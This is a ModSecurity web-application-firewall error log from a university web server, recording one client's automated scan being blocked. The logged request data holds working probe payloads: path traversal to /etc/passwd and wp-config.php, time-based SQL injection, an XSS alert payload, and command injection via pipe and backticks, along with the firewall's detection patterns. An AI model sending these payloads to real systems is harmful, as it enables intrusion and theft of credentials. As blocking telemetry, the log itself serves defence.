[Tue Aug 29 11:42:59.696428 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAAcoNlsAAAAF"]
[Tue Aug 29 11:43:00.408883 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAc921IAAAAD"]
[Tue Aug 29 11:43:00.409936 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAAcoNlwAAAAF"]
[Tue Aug 29 11:43:00.427255 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAc361EAAAAO"]
[Tue Aug 29 11:43:02.449734 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13VsCo-f0AAAdQ3jcAAAAV"]
[Tue Aug 29 11:43:03.448662 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAARpg4MAAAAU"]
[Tue Aug 29 11:43:04.412659 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAeYbzoAAAAB"]
[Tue Aug 29 11:43:04.420744 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAdxUUYAAAAC"]
[Tue Aug 29 11:43:06.436776 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAAeChaMAAAAw"]
[Tue Aug 29 11:43:07.457174 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAARpg5AAAAAU"]
[Tue Aug 29 11:43:08.484407 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAARpg5IAAAAU"]
[Tue Aug 29 11:43:08.640143 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAAdSZQUAAAAX"]
[Tue Aug 29 11:43:09.395001 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAdb7n4AAAAb"]
[Tue Aug 29 11:43:10.466966 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAAcsLJcAAAAE"]
[Tue Aug 29 11:43:11.444048 2023] [:error] [pid 1970] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAAey2msAAAAO"]
[Tue Aug 29 11:43:14.442592 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAAdxUVIAAAAC"]
[Tue Aug 29 11:43:15.655313 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAAdTBE4AAAAY"]
[Tue Aug 29 11:43:18.409068 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAAc922cAAAAD"]
[Tue Aug 29 11:43:18.417148 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAAdSZSkAAAAX"]
[Tue Aug 29 11:43:20.477820 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAc922wAAAAD"]
[Tue Aug 29 11:43:21.440259 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAe1eeIAAAAB"]
[Tue Aug 29 11:43:22.677319 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13asCo-f0AAAbo-igAAAAi"]
[Tue Aug 29 11:43:23.423361 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:token: {{token}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO13a8Co-f0AAAexIBoAAAAN"]
[Tue Aug 29 11:43:26.567367 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13bsCo-f0AAAdEChEAAAAW"]
[Tue Aug 29 11:43:27.487964 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAAcvBpIAAAAJ"]
[Tue Aug 29 11:43:28.632886 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAe397IAAAAA"]
[Tue Aug 29 11:43:29.551577 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAfEBs4AAAAO"]
[Tue Aug 29 11:43:31.382305 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13c8Co-f0AAAe398IAAAAA"]
[Tue Aug 29 11:43:31.427649 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAAdb7qAAAAAb"]
[Tue Aug 29 11:43:36.376655 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAAe399AAAAAA"]
[Tue Aug 29 11:43:37.422940 2023] [:error] [pid 1989] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAAfFKAMAAAAR"]
[Tue Aug 29 11:43:40.418619 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:m(?:s(?:ysaccessobjects|ysaces|ysobjects|ysqueries|ysrelationships|ysaccessstorage|ysaccessxml|ysmodules|ysmodules2|db)|aster\\\\.\\\\.sysdatabases|ysql\\\\.db)|s(?:ys(?:\\\\.database_name|aux)|chema(?:\\\\W*\\\\(|_name)|qlite(_temp)?_master)|d(?:atabas|b_n ..." at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "84"] [id "981320"] [rev "2"] [msg "SQL Injection Attack: Common DB Names Detected"] [data "Matched Data: db_name( found within XML: \\x0a  \\x0a    \\x0a      1=db_name(1)\\x0a    \\x0a  \\x0a"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/iOffice/prg/set/wss/udfmr.asmx"] [unique_id "ZO13fMCo-f0AAAe399gAAAAA"]
